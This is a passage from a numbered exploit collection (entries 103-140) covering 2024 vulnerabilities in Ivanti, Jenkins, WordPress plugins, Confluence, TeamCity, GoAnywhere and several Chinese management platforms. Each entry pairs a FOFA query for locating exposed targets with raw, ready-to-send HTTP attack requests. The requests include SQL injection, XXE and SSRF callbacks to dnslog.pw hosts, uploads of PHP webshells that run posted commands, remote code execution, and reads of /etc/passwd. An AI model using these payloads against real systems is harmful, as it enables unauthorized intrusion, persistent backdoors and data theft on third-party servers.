<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart (百绰智能) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart (百绰智能) S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart (百绰智能) S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat CORS SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
